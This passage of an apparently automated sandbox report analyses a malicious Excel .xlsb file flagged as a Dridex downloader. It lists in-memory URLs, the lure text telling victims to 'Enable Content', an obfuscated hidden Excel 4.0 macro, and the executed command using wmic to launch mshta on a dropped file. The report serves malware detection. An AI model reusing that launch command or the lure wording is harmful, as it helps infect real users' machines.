      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesOfficeAddInClassifierOfficeEntitiesUpdated
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiest
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.coma
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2)C
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://www.odwebp.svc.ms

      E-Banking Fraud:

      Yara detected Dridex Downloader
      Source: Yara match, File source: C:\ProgramData\lvDMlIDBF.rtf, type: DROPPED

      System Summary:

      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE 4 Once you have clicked, please click "Enable Content" 5 6
      Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED 2 Open this document with Desktop Version of Microsoft Office Excel. 3 CLICK
      Source: Screenshot number: 4, Screenshot OCR: Enable Content" 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
      Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE Once you have clicked, please click "Enable Content" H J K L
      Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 8, Screenshot OCR: Enable Content" H J K L , M , N , O , P Q R S ^ Sheet1 CD Ready O Type here to search i 'I K
      Source: Screenshot number: 12, Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE Once you have clicked, please click "Enable Content" H J K L
      Source: Screenshot number: 12, Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 12, Screenshot OCR: Enable Content" H J K L , M , N , O , P Q R S ^ Sheet1 CD Ready O Type here to search i 'I K
      Found Excel 4.0 Macro with suspicious formulas
      Source: 4310352755503838173672.xlsb, Initial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheet
      Source: 4310352755503838173672.xlsb, Initial sample: Sheet name: Macro1
      Contains functionality to create processes via WMI
      Source: EXCEL.EXE, 00000000.00000002.936525608.0000000011690000.00000004.00000001.sdmp, Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=AQRFEVRUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
      Found obfuscated Excel 4.0 Macro
      Source: 4310352755503838173672.xlsb, Macro extractor: Sheet: Macro1 high usage of CHAR() function: 26
      Source: 4310352755503838173672.xlsb, Macro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Code function: 0_3_0F885B9E 0_3_0F885B9E
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Code function: 0_3_0F886648 0_3_0F886648
      Source: 4310352755503838173672.xlsb, Virustotal: Detection: 39%
      Source: 4310352755503838173672.xlsb, ReversingLabs: Detection: 21%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown, Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\lvDMlIDBF.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:128:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe, WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\{4034AA48-0474-48B8-AD56-6C124AF9E283} - OProcSessId.dat
      Source: classification engine, Classification label: mal96.troj.expl.evad.winXLSB@5/5@0/0
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: 4310352755503838173672.xlsb, Initial sample: OLE zip file path = xl/media/image1.png
      Source: 4310352755503838173672.xlsb, Initial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      Creates processes via WMI
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe, WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      Creates and opens a fake document (probably a fake document to hide exploiting)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: cmd line: lvdmlidbf.rtf
      Source: unknown, Process created: cmd line: lvdmlidbf.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C&
      Source: EXCEL.EXE, 00000000.00000002.934018559.000000000DA01000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW8
      Source: EXCEL.EXE, 00000000.00000002.936007111.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773775862.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742682932.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653029275.000000000F793000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW1Fm
      Source: EXCEL.EXE, 00000000.00000002.936007111.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773775862.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742682932.000000000F793000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653029275.000000000F793000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
      Source: EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmp, Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: Yara match, File source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmp, Binary or memory string: Program Manager
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmp, Binary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.927541557.00000000030E0000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.927488231.00000273370A0000.00000002.00020000.sdmp, Binary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation 21 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scripting 3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 2 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 3 | NTDS | System Information Discovery 4 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      4310352755503838173672.xlsb | 40% | Virustotal |
      4310352755503838173672.xlsb | 11% | Metadefender |
      4310352755503838173672.xlsb | 21% | ReversingLabs | Document-Excel.Trojan.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

                            high
                            https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                            • URL Reputation: safe
                            unknown
                            https://substrate.office.com/search/api/v2/init=EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                              high
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                high
                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmpfalse
                                  high
                                  https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                      high
                                      https://cr.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                        high
                                        https://api.office.netYq1EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://login.windows.net/common/oauth2/authorizeC&EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
                                          high
                                          https://api.addins.store.officeppe.com/addinstemplateDEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOfEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                            high
                                            https://tasks.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                              high
